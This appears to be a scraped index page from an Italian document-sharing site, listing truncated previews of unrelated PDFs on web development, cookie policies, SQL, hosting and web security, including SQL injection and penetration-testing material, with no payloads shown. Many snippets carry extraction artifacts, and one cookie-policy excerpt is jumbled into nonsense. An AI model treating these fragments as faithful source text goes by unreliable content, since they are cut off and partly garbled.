Proge&are un sito Web Proge&are un sito Web 1 Sommario Comprendere il processo di sviluppo di un sito Web. Creare le specifiche del sito. Iden:ficare gli obie

Dettagli

La cartella web del dolore cronico non oncologico. Do#. Marco Viscon. Presidente Commissione Informa.ca ANCoM

La cartella web del dolore cronico non oncologico. Do#. Marco Viscon. Presidente Commissione Informa.ca ANCoM La cartella web del dolore cronico non oncologico Do#. Marco Viscon. Presidente Commissione Informa.ca ANCoM Il proge#o IMPACT prevede da parte dei Medici di Famiglia la registrazione di un set di da.

Dettagli

Mutui Connect La piattaforma informativa per l erogazione e la portabilità dei mutui

Mutui Connect La piattaforma informativa per l erogazione e la portabilità dei mutui Mutui Connect La piattaforma informativa per l erogazione e la portabilità dei mutui Vincenzo Gunnella Notaio Angelo Peppetti - ABI Organo collegiale Mutui Conncet 1 dicembre 2014 Ø La collaborazione ABI

Dettagli

Informativa estesa sull utilizzo dei cookie

Informativa estesa sull utilizzo dei cookie Informativa estesa sull utilizzo dei cookie che Gli OPTIMA utenti visiona S.R.L. vedranno le pagine utilizza inserite del i Cookie sito. delle per quantità rendere minime i propri informazioni servizi

Dettagli

SVN server, per Florim, è installato su server di test, anche se la sua configurazione può avvenire in qualsiasi ambiente.

SVN server, per Florim, è installato su server di test, anche se la sua configurazione può avvenire in qualsiasi ambiente. Siti FLORIM SVN Subversion Il sistema di versioning viene illustrato nell immagine seguente: Sistema locale dello sviluppatore, si parla di working copy ( copia dei file dal server in produzione) SVN server,

Dettagli

Tracciabilità degli utenti in applicazioni multipiattaforma

Tracciabilità degli utenti in applicazioni multipiattaforma Tracciabilità degli utenti in applicazioni multipiattaforma Case Study assicurativo/bancario Yann Bongiovanni y.bongiovanni@integra-group.it Roma, 4 ottobre 2006 Retroscena Un azienda multinazionale del

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28 Indice 25 184 Introduzione XI Capitolo 1 Impostazione dell ambiente di sviluppo 2 1.1 Introduzione ai siti Web dinamici 2 1.2 Impostazione dell ambiente di sviluppo 4 1.3 Scaricamento di Apache 6 1.4 Installazione

Dettagli

Il linguaggio SQL. Evoluzione del linguaggio. I linguaggi dentro SQL. I dialeu SQL. U@lizzo di SQL SQL. A. Ferrari 1

Il linguaggio SQL. Evoluzione del linguaggio. I linguaggi dentro SQL. I dialeu SQL. U@lizzo di SQL SQL. A. Ferrari 1 Il linguaggio SQL Structured Query Language SQL è un linguaggio di interrogazione per database proge

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Un successo internazionale

Un successo internazionale Un successo internazionale Case History Sediarreda Un caso di successo di E-commerce nel contesto di un distretto in crisi 2 Il cliente: Sediarreda oggi Tra i maggiori distributori italiani di prodo1 per

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

AREA SERVIZI ICT. Servizi di hosting offerti dall'area Servizi ICT. Contestualizzazione tecnologica. hosting.polimi.it

AREA SERVIZI ICT. Servizi di hosting offerti dall'area Servizi ICT. Contestualizzazione tecnologica. hosting.polimi.it AREA SERVIZI ICT Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica hosting.polimi.it Indice 1. Contestualizzazione... 4 1.1. Content Management System... 4 1.1.1. Componente

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Versione 2 Milano 14 Luglio 2006 Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603

Dettagli

COOKIES PRIVACY POLICY. Il sito web di. Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova

COOKIES PRIVACY POLICY. Il sito web di. Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova COOKIES PRIVACY POLICY Il sito web di Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova Titolare, ex art. 28 d.lgs. 196/03, del trattamento dei Suoi dati personali La rimanda

Dettagli

Solutions for Demanding Business

Solutions for Demanding Business Solutions for Demanding Business Le minacce informa%che alle transazioni online, come comba7erle. Dall auten%cazione alla prevenzione delle frodi ABI Banche e Sicurezza - Roma, 4 giugno 2015 2 Asseco Group

Dettagli

Corso di Web programming Modulo T3 A2 - Web server

Corso di Web programming Modulo T3 A2 - Web server Corso di Web programming Modulo T3 A2 - Web server 1 Prerequisiti Pagine statiche e dinamiche Pagine HTML Server e client Cenni ai database e all SQL 2 1 Introduzione In questa Unità si illustra il concetto

Dettagli

Metodi, tecniche e strumen0 del problem solving. Temi: Problem Solving: Metodo e approccio, Tecniche e strumenti Concetti base di statistica

Metodi, tecniche e strumen0 del problem solving. Temi: Problem Solving: Metodo e approccio, Tecniche e strumenti Concetti base di statistica EQDL Start Metodi, tecniche e strumen0 del problem solving Temi: Problem Solving: Metodo e approccio, Tecniche e strumenti Concetti base di statistica Syllabus da 3.3.1.1 a 3.3.3.3 La patente europea della

Dettagli

NORMATIVA ITALIANA SULLA SICUREZZA STRADALE: SITUAZIONE ATTUALE E PROSPETTIVE FUTURE

NORMATIVA ITALIANA SULLA SICUREZZA STRADALE: SITUAZIONE ATTUALE E PROSPETTIVE FUTURE NORMATIVA ITALIANA SULLA SICUREZZA STRADALE: SITUAZIONE ATTUALE E PROSPETTIVE FUTURE Do3. Ing. Salvatore Leonardi Dipar5mento di Ingegneria Civile e Ambientale Università degli Studi di Catania E- Mail:

Dettagli

Questa tipologia di cookie permette il corretto funzionamento di alcune sezioni del Sito. Sono di due categorie: persistenti e di sessione:

Questa tipologia di cookie permette il corretto funzionamento di alcune sezioni del Sito. Sono di due categorie: persistenti e di sessione: Informativa estesa sui Cookie Cosa sono i cookies? In informatica i cookie HTTP (più comunemente denominati Web cookie, tracking cookie o semplicemente cookie) sono righe di testo usate per eseguire autenticazioni

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica. Area Servizi ICT

Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica. Area Servizi ICT Area Servizi ICT Servizi hosting di Ateneo Contestualizzazione tecnologica Versione 1.1 http://hosting.polimi.it Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica Politecnico

Dettagli

INFORMATIVA ESTESA SULL USO DEI COOKIE

INFORMATIVA ESTESA SULL USO DEI COOKIE INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cantiwinestyle.com o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di cantiwinestyle.com

Dettagli

develon web d.seo Search Engine Optimization: tutto quello che dovete sapere per migliorare la vostra visibilità on line develon.

develon web d.seo Search Engine Optimization: tutto quello che dovete sapere per migliorare la vostra visibilità on line develon. develon web d.seo Search Engine Optimization: tutto quello che dovete sapere per migliorare la vostra visibilità on line develon.com Un sito non frequentato è come una festa senza invitati: il cibo più

Dettagli

SERVICE BROWSER. Versione 1.0

SERVICE BROWSER. Versione 1.0 SERVICE BROWSER Versione 1.0 25/09/2008 Indice dei Contenuti 1. Scopo del documento... 3 2. Introduzione... 3 3. Accordi di Servizio... 4 4. Servizi... 5 5. Servizio: Schede Erogatori... 8 6. Servizio:

Dettagli

Auditing di Eventi. Daniele Di Lucente

Auditing di Eventi. Daniele Di Lucente Auditing di Eventi Daniele Di Lucente Un caso che potrebbe essere reale Un intruso è riuscito a penetrare nella rete informatica della società XYZ. Chi è l intruso? Come ha fatto ad entrare? Quali informazioni

Dettagli

White Paper 1. INTRODUZIONE...2 2. TECNOLOGIE SOFTWARE IMPIEGATE...2 3. APPROCCIO PROGETTUALE...10 3. RISULTATI...10

White Paper 1. INTRODUZIONE...2 2. TECNOLOGIE SOFTWARE IMPIEGATE...2 3. APPROCCIO PROGETTUALE...10 3. RISULTATI...10 Soluzioni software di EDM "Electronic Document Management" Gestione dell archiviazione, indicizzazione, consultazione e modifica dei documenti elettronici. Un approccio innovativo basato su tecnologie

Dettagli

2 Configurazione lato Router

2 Configurazione lato Router (Virtual Private Network), è un collegamento a livello 3 (Network) stabilito ed effettuato tra due o più reti LAN attraverso una rete pubblica che non deve essere necessariamente Internet. La particolarità

Dettagli

Informativa estesa sull uso dei Cookie Policy

Informativa estesa sull uso dei Cookie Policy Informativa estesa sull uso dei Cookie Policy Proteggere la sicurezza e la privacy dei vostri dati personali è importante per questo sito, che agisce in conformità con le leggi attualmente in vigore sulla

Dettagli

Progetto NAC (Network Access Control) MARCO FAGIOLO

Progetto NAC (Network Access Control) MARCO FAGIOLO Progetto NAC (Network Access Control) MARCO FAGIOLO Introduzione Per sicurezza in ambito ICT si intende: Disponibilità dei servizi Prevenire la perdita delle informazioni Evitare il furto delle informazioni

Dettagli

Informativa estesa sui Cookie e sulla privacy

Informativa estesa sui Cookie e sulla privacy Informativa estesa sui Cookie e sulla privacy Cosa sono i cookies? In informatica i cookie HTTP (più comunemente denominati Web cookie, tracking cookie o semplicemente cookie) sono righe di testo usate

Dettagli

IL WEB NON SI LIMITA A COLLEGARE MACCHINE.

IL WEB NON SI LIMITA A COLLEGARE MACCHINE. IL WEB NON SI LIMITA A COLLEGARE MACCHINE. CONNETTE DELLE PERSONE PROPONENTI Egidio Murru, CEO, Founder, Comunica1on Manager Elia Con/ni, CTO, Founder, User Expirience Designer / Front End Engineer Sassari,

Dettagli

v. 1.0-7-11-2007 Mistral ArchiWeb 2.0 Manuale utente

v. 1.0-7-11-2007 Mistral ArchiWeb 2.0 Manuale utente v. 1.0-7-11-2007 Mistral ArchiWeb 2.0 Manuale utente Sommario 1. INTRODUZIONE...3 2. DESCRIZIONE FUNZIONALITÀ...3 2.1. LOGIN...3 2.2. SCHEDA ARCHIVIO...3 2.3. GESTIONE ARCHIVI...4 2.3.1 Creazione nuovo

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Cookie Policy. Questo documento contiene le seguenti informazioni:

Cookie Policy. Questo documento contiene le seguenti informazioni: Cookie Policy Il sito web di ASSOFERMET, con sede a Milano (Mi), in VIA GIOTTO 36 20145, Titolare, ex art. 28 d.lgs. 196/03, del trattamento dei Suoi dati personali La rimanda alla presente Policy sui

Dettagli

DNNCenter. Installazione standard di DotNetNuke 5. per Windows Vista. Installazione Standard DotNetNuke 5 per Windows Vista

DNNCenter. Installazione standard di DotNetNuke 5. per Windows Vista. Installazione Standard DotNetNuke 5 per Windows Vista DNNCenter Installazione standard di DotNetNuke 5 per Windows Vista Copyright OPSI Srl www.opsi.it Pag. 1 of 28 INDICE 1. INTRODUZIONE... 3 1.1. Pre-requisiti... 3 2. DOWNLOAD DOTNETNUKE... 4 2.1. Download

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

CMS (Content Management System) della categoria Open Source

CMS (Content Management System) della categoria Open Source Una panoramica sui CMS (Content Management System) CMS (Content Management System) della categoria Open Source Per la piattaforma PHP/MYSQL e considerata l esigenza sempre più ricorrente di realizzare

Dettagli

Indice. Introduzione. PARTE PRIMA PHP: i fondamenti 1

Indice. Introduzione. PARTE PRIMA PHP: i fondamenti 1 Indice Introduzione XV PARTE PRIMA PHP: i fondamenti 1 Capitolo 1 Perché PHP e MySQL? 3 1.1 Cos è PHP? 3 1.2 Cos è MySQL? 4 1.3 La storia di PHP 5 1.4 La storia di MySQL 6 1.5 Le ragioni per amare PHP

Dettagli

Moduli conjectfm www.fmpool.it 1

Moduli conjectfm www.fmpool.it 1 8.0 / 3.12 Gestione, utilizzo e ottimizzazione superfici e spazi Analisi delle superfici secondo la Norma DIN 277 o altre norme in vigore Acquisizione automaca dei da degli spazi da analizzare araverso

Dettagli

SQL Injection: i 5 migliori tool per individuarle

SQL Injection: i 5 migliori tool per individuarle SQL Injection: i 5 migliori tool per individuarle SQL Injection è la principale tecnica sfruttata per colpire una applicazione web basata su un database di tipo SQL, potrebbe consentire ad un malintenzionato

Dettagli

Introduzione a phpmyadmin

Introduzione a phpmyadmin Introduzione a phpmyadmin http://www.phpmyadmin.net Per chiarimenti, http://www.ing.unibs.it/~alberto.lazzaroni 1 phpmyadmin: cosa è, a cosa serve È un software di amministrazione di database MySql (MySql

Dettagli

An#ntrusione: sicuri di farla bene?

An#ntrusione: sicuri di farla bene? An#ntrusione: sicuri di farla bene? La prima cosa che si deve fare per realizzare un sistema an5ntrusione è essere sicuri di ciò che si sta facendo, dal punto di vista norma5vo e da quello dell uso delle

Dettagli

Quesiti 6 e 7) - 9 - Creiamo il file query4.php su una piattaforma OPEN SOURCE usando in linguaggio PHP ospitato su un webserver APACHE per interrogare un database MYSQL. Tale file verrà attivato cliccando

Dettagli

Traduzione e computer (3) Cris%na Bosco Informa%ca applicata alla comunicazione mul%mediale 2014-2015

Traduzione e computer (3) Cris%na Bosco Informa%ca applicata alla comunicazione mul%mediale 2014-2015 Traduzione e computer (3) Cris%na Bosco Informa%ca applicata alla comunicazione mul%mediale 2014-2015 Tipi di sistemi Fino alla metà degli anni 90 esistono solo due ;pi di sistemi di MT: Sistemi su mainframe

Dettagli

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Pag. 1/1 Sessione ordinaria 2010 Seconda prova scritta Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE CORSO DI ORDINAMENTO Indirizzo: INFORMATICA

Dettagli

Il CRM in pratica: scopriamo insieme SugarCRM

Il CRM in pratica: scopriamo insieme SugarCRM Il CRM in pratica: scopriamo insieme SugarCRM Giugno 2012 Iniziative strategiche e CRM Alcuni inizia+ve appaiono assolutamente prioritarie per le aziende, anche PMI: Ado

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

So.ware. Insieme di programmi che perme6ono al calcolatore di eseguire determinate funzionalità Si dis,ngue tra:

So.ware. Insieme di programmi che perme6ono al calcolatore di eseguire determinate funzionalità Si dis,ngue tra: Sistemi opera,vi So.ware Insieme di programmi che perme6ono al calcolatore di eseguire determinate funzionalità Si dis,ngue tra: So.ware di sistema: Sistema Opera,vo So.ware applica,vo: Applicazioni Programma

Dettagli

Guida pratica all utilizzo di Zeroshell

Guida pratica all utilizzo di Zeroshell Guida pratica all utilizzo di Zeroshell Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Proteggere una piccola rete con stile ( Autore: cristiancolombini@libero.it

Dettagli

COOKIES PRIVACY POLICY DI BANCA PROFILO

COOKIES PRIVACY POLICY DI BANCA PROFILO COOKIES PRIVACY POLICY DI BANCA PROFILO Indice e sommario del documento Premessa... 3 1. Cosa sono i Cookies... 4 2. Tipologie di Cookies... 4 3. Cookies di terze parti... 5 4. Privacy e Sicurezza sui

Dettagli

SerWeb. Modulo Drupal per u/lizzare i servizi studen/ dell Università di Napoli Parthenope

SerWeb. Modulo Drupal per u/lizzare i servizi studen/ dell Università di Napoli Parthenope SerWeb Modulo Drupal per u/lizzare i servizi studen/ dell Università di Napoli Parthenope Informazioni progeio SerWeb il nome nasce fondendo i sostan/vi dell obielvo del modulo cioè Servizi Web. Il modulo

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

Architetture di sistema

Architetture di sistema Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.6 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio

Dettagli

Istituto Tecnico Industriale Statale Dionigi Scano Cagliari. Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014.

Istituto Tecnico Industriale Statale Dionigi Scano Cagliari. Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014. Istituto Tecnico Industriale Statale Dionigi Scano Cagliari Candidato: Medda Daniele Classe 5ª C Informatica Anno scolastico 2013/2014 relate Un esperimento di social networking open source 1 Introduzione

Dettagli

Architetture di sistema

Architetture di sistema Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.7 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio

Dettagli

Come fare un cambio dominio, un restyling o una migrazione senza compromettere il posizionamento del tuo sito web.

Come fare un cambio dominio, un restyling o una migrazione senza compromettere il posizionamento del tuo sito web. Come fare un cambio dominio, un restyling o una migrazione senza compromettere il posizionamento del tuo sito web. Maurizio Palermo Stefano Rigazio Di cosa parliamo Cos è una migrazione Perché migrare

Dettagli

LA SCELTA DEL WEB HOSTING PER L E- COMMERCE. Filippo De Cecco Up Provider srl

LA SCELTA DEL WEB HOSTING PER L E- COMMERCE. Filippo De Cecco Up Provider srl LA SCELTA DEL WEB HOSTING PER L E- COMMERCE Filippo De Cecco Up Provider srl Il web è pieno di Hos/ng Provider che offrono piani hos/ng per tu: i gus/. Acquistare un hos/ng sbagliato può portare all esaurimento

Dettagli

Le poli(che di raccolta

Le poli(che di raccolta Economia e Ges(one degli Intermediari Finanziari Le poli(che di raccolta 23 O2obre 2015 Anno Accademico 2015-2016 I temi della lezione Gli obiecvi della poli(ca di raccolta. Le leve della poli(ca di raccolta.

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

COOKIES POLICY. 2. Tipologie di Cookies utilizzati da parte del sito www.elleservizi.it e/o delle aziende e dei marchi che ne fanno parte

COOKIES POLICY. 2. Tipologie di Cookies utilizzati da parte del sito www.elleservizi.it e/o delle aziende e dei marchi che ne fanno parte COOKIES POLICY Questa cookies policy contiene le seguenti informazioni : 1. Cosa sono i Cookies. 2. Tipologie di Cookies. 3. Cookies di terze parti. 4. Privacy e Sicurezza sui Cookies. 5. Altre minacce

Dettagli

Applicazione client-server in PHP con database MySQL

Applicazione client-server in PHP con database MySQL Applicazione client-server in PHP con database MySQL Emanuele Scapin 1 1 Liceo Statale F.Corradini, via Milano 1, 36016 Thiene 30/05/2012 1 Premessa Dopo la trattazione di argomenti teorici di progettazione

Dettagli

Benvenuti nella guida completa a PHP5 e MySQL!

Benvenuti nella guida completa a PHP5 e MySQL! Introduzione Benvenuti nella guida completa a PHP5 e MySQL! Gli autori di questo libro, sebbene ammettano di essere di parte, ritengono che il linguaggio di scripting Web PHP possa essere considerato il

Dettagli

COMPLETA SICUREZZA GRAZIE ALL ACCESSO PROTETTO E AI LIVELLI AUTORIZZATIVI

COMPLETA SICUREZZA GRAZIE ALL ACCESSO PROTETTO E AI LIVELLI AUTORIZZATIVI Consultazione prodotti e gestione ordini via internet SAM r-evolution La rivoluzione non è cambiare il software! SAM OW - Open Web Open-Web è l applicazione web per la consultazione online degli articoli

Dettagli

La Valutazione della Ricerca nelle Università Italiane: la SUA-RD e le prospettive future.

La Valutazione della Ricerca nelle Università Italiane: la SUA-RD e le prospettive future. La Valutazione della Ricerca nelle Università Italiane: la SUA-RD e le prospettive future. Massimo Castagnaro Coordinatore AVA - Consiglio Direttivo ANVUR massimo.castagnaro@anvur.org Roma, 11.11.2014

Dettagli

Collocazione della Metrica Web

Collocazione della Metrica Web Collocazione della Metrica Web Strategia Organizzazione Produzione Promozione Metrica Flussi di un Sistema di Analisi Configurazione Log files data base Analysis Engine Report Tecnici Report Marketing

Dettagli

DB2 Universal Database (UDB) DB2 Universal Database (UDB)

DB2 Universal Database (UDB) DB2 Universal Database (UDB) DB2 Universal Database (UDB) Sistemi Informativi L-A Home Page del corso: http://www-db.deis.unibo.it/courses/sil-a/ Versione elettronica: DB2Presentazione2009.pdf Sistemi Informativi L-A DB2 Universal

Dettagli

Workgroup. Windows NT dispone di due strutture di rete

Workgroup. Windows NT dispone di due strutture di rete Descrizione generale dell architettura del sistema e dell interazione tra i suoi componenti. Descrizione del sottosistema di sicurezza locale. Descrizione delle tecniche supportate dal sistema per l organizzazione

Dettagli

www.avg.it Come navigare senza rischi

www.avg.it Come navigare senza rischi Come navigare senza rischi 01 02 03 04 05 06.Introduzione 01.Naviga in Sicurezza 02.Social Network 08.Cosa fare in caso di...? 22.Supporto AVG 25.Link e riferimenti 26 [02] 1.introduzione l obiettivo di

Dettagli